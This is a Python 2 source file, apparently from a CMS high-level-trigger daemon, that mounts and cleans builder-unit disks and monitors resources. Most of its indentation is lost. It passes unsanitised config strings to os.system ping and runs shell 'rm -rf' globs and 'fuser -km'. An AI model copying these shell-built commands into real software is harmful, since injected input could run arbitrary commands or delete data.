logger.warning("umount failed, trying to kill users of mountpoint "+point)
try:
nsslock.acquire()
f_user = subprocess.Popen(['fuser','-km',os.path.join('/'+point,conf.ramdisk_subdirectory)],shell=False,preexec_fn=preexec_function,close_fds=True)
nsslock.release()
f_user.wait()
except:
try:nsslock.release()
except:pass
return umount_helper(point,attemptsLeft-1,initial=False)
else:
attemptsLeft-=1
time.sleep(.5)
try:
logger.info("trying umount -f of "+point)
subprocess.check_call(['umount','-f',point])
except subprocess.CalledProcessError, err2:
if err2.returncode<2:return True
if attemptsLeft<=0:
logger.error('Failed to perform umount -f of '+point+'. returncode:'+str(err2.returncode))
return False
return umount_helper(point,attemptsLeft,initial=False)
return True
def cleanup_mountpoints(remount=True):
global bu_disk_list_ramdisk
global bu_disk_list_ramdisk_instance
global bu_disk_list_output
global bu_disk_list_output_instance
global bu_disk_ramdisk_CI
global bu_disk_ramdisk_CI_instance
bu_disk_list_ramdisk = []
bu_disk_list_output = []
bu_disk_list_ramdisk_instance = []
bu_disk_list_output_instance = []
bu_disk_ramdisk_CI=None
bu_disk_ramdisk_CI_instance=None
if conf.bu_base_dir[0] == '/':
bu_disk_list_ramdisk = [os.path.join(conf.bu_base_dir,conf.ramdisk_subdirectory)]
bu_disk_list_output = [os.path.join(conf.bu_base_dir,conf.output_subdirectory)]
if conf.instance=="main":
bu_disk_list_ramdisk_instance = bu_disk_list_ramdisk
bu_disk_list_output_instance = bu_disk_list_output
else:
bu_disk_list_ramdisk_instance = [os.path.join(bu_disk_list_ramdisk[0],conf.instance)]
bu_disk_list_output_instance = [os.path.join(bu_disk_list_output[0],conf.instance)]
#make subdirectories if necessary and return
if remount==True:
try:
os.makedirs(os.path.join(conf.bu_base_dir,conf.ramdisk_subdirectory))
except OSError:
pass
try:
os.makedirs(os.path.join(conf.bu_base_dir,conf.output_subdirectory))
except OSError:
pass
return True
try:
process = subprocess.Popen(['mount'],stdout=subprocess.PIPE)
out = process.communicate()[0]
mounts = re.findall('/'+conf.bu_base_dir+'[0-9]+',out) + re.findall('/'+conf.bu_base_dir+'-CI/',out)
mounts = sorted(list(set(mounts)))
logger.info("cleanup_mountpoints: found following mount points: ")
logger.info(mounts)
umount_failure=False
for mpoint in mounts:
point = mpoint.rstrip('/')
umount_failure = umount_helper(os.path.join('/'+point,conf.ramdisk_subdirectory))==False
#only attempt this if first umount was successful
if umount_failure==False and not point.rstrip('/').endswith("-CI"):
umount_failure = umount_helper(os.path.join('/'+point,conf.output_subdirectory))==False
#this will remove directories only if they are empty (as unmounted mount point should be)
try:
if os.path.join('/'+point,conf.ramdisk_subdirectory)!='/':
os.rmdir(os.path.join('/'+point,conf.ramdisk_subdirectory))
except Exception as ex:
logger.exception(ex)
try:
if os.path.join('/'+point,conf.output_subdirectory)!='/':
if not point.rstrip('/').endswith("-CI"):
os.rmdir(os.path.join('/'+point,conf.output_subdirectory))
except Exception as ex:
logger.exception(ex)
if remount==False:
if umount_failure:return False
return True
i = 0
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
lines = []
with open(bus_config) as fp:
                lines = fp.readlines()
            # record the initial mtime up front so the bus.config staleness
            # checks in the control-interface block below do not hit an
            # undefined busconfig_age
            busconfig_age = os.path.getmtime(bus_config)
if conf.mount_control_path and len(lines):
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory))
except OSError:
pass
try:
mountaddr = lines[0].split('.')[0]+'.cms'
#VM fallback
                if lines[0].strip().endswith('.cern.ch'): mountaddr = lines[0].strip()
logger.info("found BU to mount (CI) at " + mountaddr)
except Exception as ex:
logger.fatal('Unable to parse bus.config file')
logger.exception(ex)
sys.exit(1)
attemptsLeft = 8
while attemptsLeft>0:
#by default ping waits 10 seconds
p_begin = datetime.datetime.now()
if os.system("ping -c 1 "+mountaddr)==0:
break
else:
p_end = datetime.datetime.now()
logger.warning('unable to ping '+mountaddr)
dt = p_end - p_begin
if dt.seconds < 10:
time.sleep(10-dt.seconds)
attemptsLeft-=1
if attemptsLeft==0:
logger.fatal('hltd was unable to ping BU '+mountaddr)
#check if bus.config has been updated
if (os.path.getmtime(bus_config) - busconfig_age)>1:
return cleanup_mountpoints(remount)
attemptsLeft=8
#sys.exit(1)
if True:
logger.info("trying to mount (CI) "+mountaddr+':/fff/'+conf.ramdisk_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_ramdisk,
mountaddr+':/fff/'+conf.ramdisk_subdirectory,
os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory)
bu_disk_ramdisk_CI=toappend
if conf.instance=="main":
bu_disk_ramdisk_CI_instance = toappend
else:
bu_disk_ramdisk_CI_instance = os.path.join(toappend,conf.instance)
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount ramdisk - exiting.")
sys.exit(1)
busconfig_age = os.path.getmtime(bus_config)
for line in lines:
logger.info("found BU to mount at "+line.strip())
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory))
except OSError:
pass
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory))
except OSError:
pass
attemptsLeft = 8
while attemptsLeft>0:
#by default ping waits 10 seconds
p_begin = datetime.datetime.now()
if os.system("ping -c 1 "+line.strip())==0:
break
else:
p_end = datetime.datetime.now()
logger.warning('unable to ping '+line.strip())
dt = p_end - p_begin
if dt.seconds < 10:
time.sleep(10-dt.seconds)
attemptsLeft-=1
if attemptsLeft==0:
logger.fatal('hltd was unable to ping BU '+line.strip())
#check if bus.config has been updated
if (os.path.getmtime(bus_config) - busconfig_age)>1:
return cleanup_mountpoints(remount)
attemptsLeft=8
#sys.exit(1)
if True:
logger.info("trying to mount "+line.strip()+':/fff/'+conf.ramdisk_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_ramdisk,
line.strip()+':/fff/'+conf.ramdisk_subdirectory,
os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory)
bu_disk_list_ramdisk.append(toappend)
if conf.instance=="main":
bu_disk_list_ramdisk_instance.append(toappend)
else:
bu_disk_list_ramdisk_instance.append(os.path.join(toappend,conf.instance))
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount ramdisk - exiting.")
sys.exit(1)
logger.info("trying to mount "+line.strip()+':/fff/'+conf.output_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_output,
line.strip()+':/fff/'+conf.output_subdirectory,
os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory)
bu_disk_list_output.append(toappend)
if conf.instance=="main" or conf.instance_same_destination==True:
bu_disk_list_output_instance.append(toappend)
else:
bu_disk_list_output_instance.append(os.path.join(toappend,conf.instance))
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount output - exiting.")
sys.exit(1)
i+=1
#clean up suspended state
try:
if remount==True:os.popen('rm -rf '+conf.watch_directory+'/suspend*')
except:pass
except Exception as ex:
logger.error("Exception in cleanup_mountpoints")
logger.exception(ex)
if remount==True:
logger.fatal("Unable to handle (un)mounting")
return False
else:return False
def submount_size(basedir):
loop_size=0
try:
p = subprocess.Popen("mount", shell=False, stdout=subprocess.PIPE)
p.wait()
std_out=p.stdout.read().split("\n")
for l in std_out:
try:
ls = l.strip()
toks = l.split()
if toks[0].startswith(basedir) and toks[2].startswith(basedir) and 'loop' in toks[5]:
imgstat = os.stat(toks[0])
imgsize = imgstat.st_size
loop_size+=imgsize
except:pass
except:pass
return loop_size
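# Example of a mount(8) output line that the parser above would count
# (device, image and mount point invented for illustration); toks[0] is the
# backing image, toks[2] the mount point and toks[5] the option list, which
# must mention 'loop':
#
#   /fff/ramdisk/img0 on /fff/BU0/ramdisk type ext4 (rw,loop=/dev/loop0)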
def cleanup_bu_disks(run=None,cleanRamdisk=True,cleanOutput=True):
if cleanRamdisk:
if conf.watch_directory.startswith('/fff') and conf.ramdisk_subdirectory in conf.watch_directory:
logger.info('cleanup BU disks: deleting runs in ramdisk ...')
tries = 10
while tries > 0:
tries-=1
if run==None:
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/run*',shell=True)
else:
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/run'+str(run),shell=True)
p.wait()
if p.returncode==0:
logger.info('Ramdisk cleanup performed')
break
else:
logger.info('Failed ramdisk cleanup (return code:'+str(p.returncode)+') in attempt'+str(10-tries))
if cleanOutput:
outdirPath = conf.watch_directory[:conf.watch_directory.find(conf.ramdisk_subdirectory)]+conf.output_subdirectory
logger.info('outdirPath:'+ outdirPath + ' '+conf.output_subdirectory)
if outdirPath.startswith('/fff') and conf.output_subdirectory in outdirPath:
logger.info('cleanup BU disks: deleting runs in output disk ...')
tries = 10
while tries > 0:
tries-=1
if run==None:
p = subprocess.Popen("rm -rf " + outdirPath+'/run*',shell=True)
else:
p = subprocess.Popen("rm -rf " + outdirPath+'/run'+str(run),shell=True)
p.wait()
if p.returncode==0:
logger.info('Output cleanup performed')
break
else:
logger.info('Failed output disk cleanup (return code:'+str(p.returncode)+') in attempt '+str(10-tries))
def calculate_threadnumber():
global nthreads
global nstreams
global expected_processes
idlecount = len(os.listdir(idles))
if conf.cmssw_threads_autosplit>0:
nthreads = idlecount/conf.cmssw_threads_autosplit
nstreams = idlecount/conf.cmssw_threads_autosplit
        if nthreads*conf.cmssw_threads_autosplit != idlecount:
logger.error("idle cores can not be evenly split to cmssw threads")
else:
nthreads = conf.cmssw_threads
nstreams = conf.cmssw_streams
expected_processes = idlecount/nstreams
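# Worked example of the split above (numbers invented): with 24 idle core
# files and cmssw_threads_autosplit=8, nthreads = nstreams = 24/8 = 3 and
# expected_processes = 24/3 = 8, i.e. eight 3-threaded CMSSW processes.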
def updateBlacklist(blfile):
black_list=[]
active_black_list=[]
#TODO:this will be updated to read blacklist from database
if conf.role=='bu':
try:
if os.stat(blfile).st_size>0:
with open(blfile,'r') as fi:
try:
static_black_list = json.load(fi)
for item in static_black_list:
black_list.append(item)
logger.info("found these resources in " + blfile + " : " + str(black_list))
except ValueError:
logger.error("error parsing /etc/appliance/blacklist")
except:
#no blacklist file, this is ok
pass
black_list=list(set(black_list))
try:
forceUpdate=False
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'r') as fi:
active_black_list = json.load(fi)
except:
forceUpdate=True
if forceUpdate==True or active_black_list != black_list:
try:
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'w') as fi:
json.dump(black_list,fi)
except:
return False,black_list
#TODO:check on FU if blacklisted
return True,black_list
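# Sketch of the static blacklist file read above (host names hypothetical):
# /etc/appliance/blacklist is expected to contain a plain JSON list, e.g.
#
#   ["fu-c2f13-41-01", "fu-c2f13-41-02"]
#
# which is then mirrored into <watch_directory>/appliance/blacklist.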
def restartLogCollector(instanceParam):
global logCollector
if logCollector!=None:
logger.info("terminating logCollector")
logCollector.terminate()
logCollector = None
logger.info("starting logcollector.py")
logcollector_args = ['/opt/hltd/python/logcollector.py']
logcollector_args.append(instanceParam)
logCollector = subprocess.Popen(logcollector_args,preexec_fn=preexec_function,close_fds=True)
class system_monitor(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.running = True
self.hostname = os.uname()[1]
self.directory = []
self.file = []
self.rehash()
self.create_file=True
self.threadEvent = threading.Event()
self.threadEventStat = threading.Event()
self.statThread = None
self.stale_flag=False
self.boxdoc_version = boxdoc_version
if conf.mount_control_path:
self.startStatNFS()
def rehash(self):
if conf.role == 'fu':
self.check_directory = [os.path.join(x,'appliance','dn') for x in bu_disk_list_ramdisk_instance]
#write only in one location
if conf.mount_control_path:
logger.info('Updating box info via control interface')
self.directory = [os.path.join(bu_disk_ramdisk_CI_instance,'appliance','boxes')]
else:
logger.info('Updating box info via data interface')
self.directory = [os.path.join(bu_disk_list_ramdisk_instance[0],'appliance','boxes')]
self.check_file = [os.path.join(x,self.hostname) for x in self.check_directory]
else:
self.directory = [os.path.join(conf.watch_directory,'appliance/boxes/')]
try:
#if directory does not exist: check if it is renamed to specific name (non-main instance)
if not os.path.exists(self.directory[0]) and conf.instance=="main":
os.makedirs(self.directory[0])
except OSError:
pass
self.file = [os.path.join(x,self.hostname) for x in self.directory]
logger.info("system_monitor: rehash found the following BU disk(s):"+str(self.file))
for disk in self.file:
logger.info(disk)
def startStatNFS(self):
if conf.role == "fu":
self.statThread = threading.Thread(target = self.runStatNFS)
self.statThread.start()
def runStatNFS(self):
fu_stale_counter=0
fu_stale_counter2=0
while self.running:
if conf.mount_control_path:
self.threadEventStat.wait(2)
time_start = time.time()
err_detected = False
try:
#check for NFS stale file handle
for disk in bu_disk_list_ramdisk:
mpstat = os.stat(disk)
for disk in bu_disk_list_output:
mpstat = os.stat(disk)
if bu_disk_ramdisk_CI:
disk = bu_disk_ramdisk_CI
mpstat = os.stat(disk)
#no issue if we reached this point
fu_stale_counter = 0
except (IOError,OSError) as ex:
err_detected=True
if ex.errno == 116:
if fu_stale_counter==0 or fu_stale_counter%500==0:
logger.fatal('detected stale file handle: '+str(disk))
else:
logger.warning('stat mountpoint ' + str(disk) + ' caught Error: '+str(ex))
fu_stale_counter+=1
err_detected=True
except Exception as ex:
err_detected=True
logger.warning('stat mountpoint ' + str(disk) + ' caught exception: '+str(ex))
#if stale handle checks passed, check if write access and timing are normal
#for all data network ramdisk mountpoints
if conf.mount_control_path and not err_detected:
try:
for mfile in self.check_file:
with open(mfile,'w') as fp:
fp.write('{}')
fu_stale_counter2 = 0
#os.stat(mfile)
except IOError as ex:
err_detected = True
fu_stale_counter2+=1
if ex.errno==2:
                        #still an error if hltd on BU did not create 'appliance/dn' dir
if fu_stale_counter2==0 or fu_stale_counter2%20==0:
logger.warning('unable to update '+mfile+ ' : '+str(ex))
else:
logger.error('update file ' + mfile + ' caught Error:'+str(ex))
except Exception as ex:
err_detected = True
logger.error('update file ' + mfile + ' caught exception:'+str(ex))
            #measure time needed to do these actions. stale flag is set if it takes more than 5 seconds or an error was detected
stat_time_delta = time.time()-time_start
if stat_time_delta>5:
if conf.mount_control_path:
logger.warning("unusually long time ("+str(stat_time_delta)+"s) was needed to perform file handle and boxinfo stat check")
else:
logger.warning("unusually long time ("+str(stat_time_delta)+"s) was needed to perform stale file handle check")
if stat_time_delta>5 or err_detected:
self.stale_flag=True
else:
#clear stale flag if successful
self.stale_flag=False
#no loop if called inside main loop
if not conf.mount_control_path:
return
def run(self):
try:
logger.debug('entered system monitor thread ')
global suspended
global ramdisk_submount_size
global masked_resources
res_path_temp = os.path.join(conf.watch_directory,'appliance','resource_summary_temp')
res_path = os.path.join(conf.watch_directory,'appliance','resource_summary')
selfhost = os.uname()[1]
boxinfo_update_attempts=0
counter=0
while self.running:
self.threadEvent.wait(5 if counter>0 else 1)
counter+=1
counter=counter%5
if suspended:continue
tstring = datetime.datetime.utcfromtimestamp(time.time()).isoformat()
ramdisk = None
if conf.role == 'bu':
ramdisk = os.statvfs(conf.watch_directory)
ramdisk_occ=1
try:ramdisk_occ = float((ramdisk.f_blocks - ramdisk.f_bavail)*ramdisk.f_bsize - ramdisk_submount_size)/float(ramdisk.f_blocks*ramdisk.f_bsize - ramdisk_submount_size)
except:pass
                    if ramdisk_occ<0:
                        logger.info('incorrect ramdisk occupancy: '+str(ramdisk_occ))
                        ramdisk_occ=0
                    if ramdisk_occ>1:
                        logger.info('incorrect ramdisk occupancy: '+str(ramdisk_occ))
                        ramdisk_occ=1
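                    # e.g. (numbers invented for illustration): with 4 TB of
                    # ramdisk blocks, 1 TB free and 0.5 TB held by loop
                    # submounted images, occupancy = (4-1-0.5)/(4-0.5) ~ 0.71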
#init
resource_count_idle = 0
resource_count_used = 0
resource_count_broken = 0
resource_count_quarantined = 0
resource_count_stale = 0
resource_count_pending = 0
resource_count_activeRun = 0
cloud_count = 0
lastFURuns = []
lastFUrun=-1
activeRunQueuedLumisNum = -1
activeRunCMSSWMaxLumi = -1
active_res = 0
fu_data_alarm=False
current_time = time.time()
stale_machines = []
try:
current_runnumber = runList.getLastRun().runnumber
except:
current_runnumber=0
for key in boxinfoFUMap:
if key==selfhost:continue
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:continue #deleted?
if current_time - etime > 10 or edata == None: continue
try:
try:
if edata['version']!=self.boxdoc_version:
logger.warning('box file version mismatch from '+str(key)+' got:'+str(edata['version'])+' required:'+str(self.boxdoc_version))
continue
except:
logger.warning('box file version for '+str(key)+' not found')
continue
if edata['detectedStaleHandle']:
stale_machines.append(str(key))
resource_count_stale+=edata['idles']+edata['used']+edata['broken']
else:
if current_runnumber in edata['activeRuns']:
resource_count_activeRun += edata['used_activeRun']+edata['broken_activeRun']
active_addition =0
if edata['cloudState'] == "resourcesReleased":
resource_count_pending += edata['idles']
else:
resource_count_idle+=edata['idles']
active_addition+=edata['idles']
active_addition+=edata['used']
resource_count_used+=edata['used']
resource_count_broken+=edata['broken']
resource_count_quarantined+=edata['quarantined']
#active resources reported to BU if cloud state is off
if edata['cloudState'] == "off":
active_res+=active_addition
cloud_count+=edata['cloud']
fu_data_alarm = edata['fuDataAlarm'] or fu_data_alarm
except Exception as ex:
logger.warning('problem updating boxinfo summary: '+str(ex))
try:
lastFURuns.append(edata['activeRuns'][-1])
except:pass
if len(stale_machines) and counter==1:
logger.warning("detected stale box resources: "+str(stale_machines))
fuRuns = sorted(list(set(lastFURuns)))
if len(fuRuns)>0:
lastFUrun = fuRuns[-1]
#second pass
for key in boxinfoFUMap:
if key==selfhost:continue
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:continue #deleted?
if current_time - etime > 10 or edata == None: continue
try:
try:
if edata['version']!=self.boxdoc_version: continue
except: continue
lastrun = edata['activeRuns'][-1]
if lastrun==lastFUrun:
qlumis = int(edata['activeRunNumQueuedLS'])
if qlumis>activeRunQueuedLumisNum:activeRunQueuedLumisNum=qlumis
maxcmsswls = int(edata['activeRunCMSSWMaxLS'])
if maxcmsswls>activeRunCMSSWMaxLumi:activeRunCMSSWMaxLumi=maxcmsswls
except:pass
res_doc = {
"active_resources":active_res,
"active_resources_activeRun":resource_count_activeRun,
#"active_resources":resource_count_activeRun,
"idle":resource_count_idle,
"used":resource_count_used,
"broken":resource_count_broken,
"quarantined":resource_count_quarantined,
"stale_resources":resource_count_stale,
"cloud":cloud_count,
"pending_resources":resource_count_pending,
"activeFURun":lastFUrun,
"activeRunNumQueuedLS":activeRunQueuedLumisNum,
"activeRunCMSSWMaxLS":activeRunCMSSWMaxLumi,
"ramdisk_occupancy":ramdisk_occ,
"fuDiskspaceAlarm":fu_data_alarm
}
with open(res_path_temp,'w') as fp:
json.dump(res_doc,fp,indent=True)
os.rename(res_path_temp,res_path)
res_doc['fm_date']=tstring
try:boxInfo.ec.injectSummaryJson(res_doc)
except:pass
for mfile in self.file:
if conf.role == 'fu':
#check if stale file handle (or slow access)
if not conf.mount_control_path:
self.runStatNFS()
if fu_watchdir_is_mountpoint:
dirstat = os.statvfs(conf.watch_directory)
                            d_used = ((dirstat.f_blocks - dirstat.f_bavail)*dirstat.f_bsize)>>20
                            d_total = (dirstat.f_blocks*dirstat.f_bsize)>>20
else:
p = subprocess.Popen("du -s --exclude " + ES_DIR_NAME + " --exclude mon --exclude open " + str(conf.watch_directory), shell=True, stdout=subprocess.PIPE)
p.wait()
std_out=p.stdout.read()
out = std_out.split('\t')[0]
d_used = int(out)>>10
d_total = conf.max_local_disk_usage
lastrun = runList.getLastRun()
n_used_activeRun=0
n_broken_activeRun=0
try:
#if cloud_mode==True and entering_cloud_mode==True:
# n_idles = 0
# n_used = 0
# n_broken = 0
# n_cloud = len(os.listdir(cloud))+len(os.listdir(idles))+len(os.listdir(used))+len(os.listdir(broken))
#else:
usedlist = os.listdir(used)
brokenlist = os.listdir(broken)
if lastrun:
try:
n_used_activeRun = lastrun.countOwnedResourcesFrom(usedlist)
n_broken_activeRun = lastrun.countOwnedResourcesFrom(brokenlist)
except:pass
n_idles = len(os.listdir(idles))
n_used = len(usedlist)
n_broken = len(brokenlist)
n_cloud = len(os.listdir(cloud))
global num_excluded
n_quarantined = len(os.listdir(quarantined))-num_excluded
if n_quarantined<0: n_quarantined=0
numQueuedLumis,maxCMSSWLumi=self.getLumiQueueStat()
cloud_state = "off"
if cloud_mode:
if entering_cloud_mode: cloud_state="starting"
elif exiting_cloud_mode:cloud_state="stopping"
else: cloud_state="on"
elif resources_blocked_flag:
cloud_state = "resourcesReleased"
elif masked_resources:
cloud_state = "resourcesMasked"
else:
cloud_state = "off"
boxdoc = {
'fm_date':tstring,
'idles' : n_idles,
'used' : n_used,
'broken' : n_broken,
'used_activeRun' : n_used_activeRun,
'broken_activeRun' : n_broken_activeRun,
'cloud' : n_cloud,
'quarantined' : n_quarantined,
'usedDataDir' : d_used,
'totalDataDir' : d_total,
'fuDataAlarm' : d_used > 0.9*d_total,
'activeRuns' : runList.getActiveRunNumbers(),
'activeRunNumQueuedLS':numQueuedLumis,
'activeRunCMSSWMaxLS':maxCMSSWLumi,
'activeRunStats':runList.getStateDoc(),
'cloudState':cloud_state,
'detectedStaleHandle':self.stale_flag,
'version':self.boxdoc_version
}
with open(mfile,'w+') as fp:
json.dump(boxdoc,fp,indent=True)
boxinfo_update_attempts=0
except (IOError,OSError) as ex:
logger.warning('boxinfo file write failed :'+str(ex))
#detecting stale file handle on recreated loop fs and remount
if conf.instance!='main' and (ex.errno==116 or ex.errno==2) and boxinfo_update_attempts>=5:
boxinfo_update_attempts=0
try:os.unlink(os.path.join(conf.watch_directory,'suspend0'))
except:pass
with open(os.path.join(conf.watch_directory,'suspend0'),'w'):
pass
time.sleep(1)
boxinfo_update_attempts+=1
except Exception as ex:
                        logger.warning('exception on boxinfo file write failed: '+str(ex))
if conf.role == 'bu':
outdir = os.statvfs('/fff/output')
boxdoc = {
'fm_date':tstring,
'usedRamdisk':((ramdisk.f_blocks - ramdisk.f_bavail)*ramdisk.f_bsize - ramdisk_submount_size)>>20,
'totalRamdisk':(ramdisk.f_blocks*ramdisk.f_bsize - ramdisk_submount_size)>>20,
'usedOutput':((outdir.f_blocks - outdir.f_bavail)*outdir.f_bsize)>>20,
'totalOutput':(outdir.f_blocks*outdir.f_bsize)>>20,
'activeRuns':runList.getActiveRunNumbers(),
"version":self.boxdoc_version
}
with open(mfile,'w+') as fp:
json.dump(boxdoc,fp,indent=True)
except Exception as ex:
logger.exception(ex)
for mfile in self.file:
try:
os.remove(mfile)
except OSError:
pass
logger.debug('exiting system monitor thread ')
def getLumiQueueStat(self):
try:
with open(os.path.join(conf.watch_directory,'run'+str(runList.getLastRun().runnumber).zfill(conf.run_number_padding),
'open','queue_status.jsn'),'r') as fp:
#fcntl.flock(fp, fcntl.LOCK_EX)
statusDoc = json.load(fp)
return str(statusDoc["numQueuedLS"]),str(statusDoc["CMSSWMaxLS"])
except:
return "-1","-1"
def stop(self):
logger.debug("system_monitor: request to stop")
self.running = False
self.threadEvent.set()
self.threadEventStat.set()
if self.statThread:
self.statThread.join()
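
# --- illustrative sketch (not part of hltd) -----------------------------------
# getLumiQueueStat above parses 'open/queue_status.jsn' in the latest run
# directory. A minimal standalone reader, assuming only the two keys actually
# used there ("numQueuedLS" and "CMSSWMaxLS"):
def _example_read_queue_status(path):
    """Return (numQueuedLS, CMSSWMaxLS) as strings, or ("-1","-1") on error."""
    import json
    try:
        with open(path, 'r') as fp:
            doc = json.load(fp)
        return str(doc["numQueuedLS"]), str(doc["CMSSWMaxLS"])
    except Exception:
        return "-1", "-1"
# -------------------------------------------------------------------------------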
class BUEmu:
def __init__(self):
self.process=None
self.runnumber = None
def startNewRun(self,nr):
if self.runnumber:
logger.error("Another BU emulator run "+str(self.runnumber)+" is already ongoing")
return
self.runnumber = nr
configtouse = conf.test_bu_config
destination_base = None
if role == 'fu':
destination_base = bu_disk_list_ramdisk_instance[startindex%len(bu_disk_list_ramdisk_instance)]
else:
destination_base = conf.watch_directory
if "_patch" in conf.cmssw_default_version:
full_release="cmssw-patch"
else:
full_release="cmssw"
new_run_args = [conf.cmssw_script_location+'/startRun.sh',
conf.cmssw_base,
conf.cmssw_arch,
conf.cmssw_default_version,
conf.exec_directory,
full_release,
'null',
configtouse,
str(nr),
'/tmp', #input dir is not needed
destination_base,
'1',
'1']
try:
self.process = subprocess.Popen(new_run_args,
preexec_fn=preexec_function,
close_fds=True
)
except Exception as ex:
logger.error("Error in forking BU emulator process")
logger.error(ex)
def stop(self):
os.kill(self.process.pid,SIGINT)
self.process.wait()
self.runnumber=None
bu_emulator=BUEmu()
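
# --- illustrative sketch (not part of hltd) -----------------------------------
# BUEmu.startNewRun above and OnlineResource.StartNewProcess below build the
# same positional argument list for startRun.sh. A sketch of that layout; the
# slot names follow StartNewProcess and are descriptive assumptions only (the
# shell script defines the real contract):
def _example_start_run_args(script, cmssw_base, arch, version, exec_dir,
                            release, menu, transfermode, runnumber,
                            input_dir, output_dir, num_threads, num_streams):
    return [script, cmssw_base, arch, version, exec_dir, release, menu,
            transfermode, str(runnumber), input_dir, output_dir,
            str(num_threads), str(num_streams)]
# -------------------------------------------------------------------------------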
class OnlineResource:
def __init__(self,parent,resourcenames,lock):
self.parent = parent
self.hoststate = 0 #@@MO what is this used for?
self.cpu = resourcenames
self.process = None
self.processstate = None
self.watchdog = None
self.runnumber = None
self.assigned_run_dir = None
self.lock = lock
self.retry_attempts = 0
self.quarantined = []
def ping(self):
if conf.role == 'bu':
if not os.system("ping -c 1 "+self.cpu[0])==0: pass #self.hoststate = 0
def NotifyNewRunStart(self,runnumber):
self.runnumber = runnumber
self.notifyNewRunThread = threading.Thread(target = self.NotifyNewRun,args=[runnumber])
self.notifyNewRunThread.start()
def NotifyNewRunJoin(self):
self.notifyNewRunThread.join()
self.notifyNewRunThread=None
def NotifyNewRun(self,runnumber):
self.runnumber = runnumber
logger.info("calling start of run on "+self.cpu[0])
attemptsLeft=3
while attemptsLeft>0:
attemptsLeft-=1
try:
connection = httplib.HTTPConnection(self.cpu[0], conf.cgi_port - conf.cgi_instance_port_offset,timeout=10)
connection.request("GET",'cgi-bin/start_cgi.py?run='+str(runnumber))
response = connection.getresponse()
#do something intelligent with the response code
logger.error("response was "+str(response.status))
if response.status > 300: self.hoststate = 1
else:
logger.info(response.read())
break
except Exception as ex:
if attemptsLeft>0:
logger.error(str(ex))
logger.info('retrying connection to '+str(self.cpu[0]))
else:
logger.error('Exhausted attempts to contact '+str(self.cpu[0]))
logger.exception(ex)
def NotifyShutdown(self):
try:
            connection = httplib.HTTPConnection(self.cpu[0], conf.cgi_port - conf.cgi_instance_port_offset,timeout=5)
connection.request("GET",'cgi-bin/stop_cgi.py?run='+str(self.runnumber))
time.sleep(0.05)
response = connection.getresponse()
time.sleep(0.05)
#do something intelligent with the response code
#if response.status > 300: self.hoststate = 0
except Exception as ex:
logger.exception(ex)
def StartNewProcess(self ,runnumber, startindex, arch, version, menu,transfermode,num_threads,num_streams):
logger.debug("OnlineResource: StartNewProcess called")
self.runnumber = runnumber
"""
this is just a trick to be able to use two
independent mounts of the BU - it should not be necessary in due course
IFF it is necessary, it should address "any" number of mounts, not just 2
"""
input_disk = bu_disk_list_ramdisk_instance[startindex%len(bu_disk_list_ramdisk_instance)]
inputdirpath = os.path.join(input_disk,'run'+str(runnumber).zfill(conf.run_number_padding))
#run_dir = input_disk + '/run' + str(self.runnumber).zfill(conf.run_number_padding)
logger.info("starting process with "+version+" and run number "+str(runnumber)+ ' threads:'+str(num_threads)+' streams:'+str(num_streams))
if "_patch" in version:
full_release="cmssw-patch"
else:
full_release="cmssw"
if not conf.dqm_machine:
new_run_args = [conf.cmssw_script_location+'/startRun.sh',
conf.cmssw_base,
arch,
version,
conf.exec_directory,
full_release,
menu,
transfermode,
str(runnumber),
input_disk,
conf.watch_directory,
str(num_threads),
str(num_streams)]
else: # a dqm machine
dqm_globalrun_file = input_disk + '/' + dqm_globalrun_filepattern.format(str(runnumber).zfill(conf.run_number_padding))
runkey = ''
try:
with open(dqm_globalrun_file, 'r') as f:
for line in f:
runkey = re.search(r'\s*run_key\s*=\s*([0-9A-Za-z_]*)', line, re.I)
if runkey:
runkey = runkey.group(1).lower()
break
            except IOError as ex:
                logger.exception(ex)
                logger.info("the default run key will be used for the dqm jobs")
new_run_args = [conf.cmssw_script_location+'/startDqmRun.sh',
conf.cmssw_base,
arch,
conf.exec_directory,
str(runnumber),
input_disk,
used+self.cpu[0]]
if self.watchdog:
new_run_args.append('skipFirstLumis=True')
if runkey:
new_run_args.append('runkey={0}'.format(runkey))
else:
                logger.info('Not able to determine the DQM run key from the "global" file. Default value from the input source will be used.')
try:
# dem = demote.demote(conf.user)
self.process = subprocess.Popen(new_run_args,
preexec_fn=preexec_function,
close_fds=True
)
logger.info("arg array "+str(new_run_args).translate(None, "'")+' started with pid '+str(self.process.pid))
# time.sleep(1.)
if self.watchdog==None:
self.processstate = 100
self.watchdog = ProcessWatchdog(self,self.lock,inputdirpath)
self.watchdog.start()
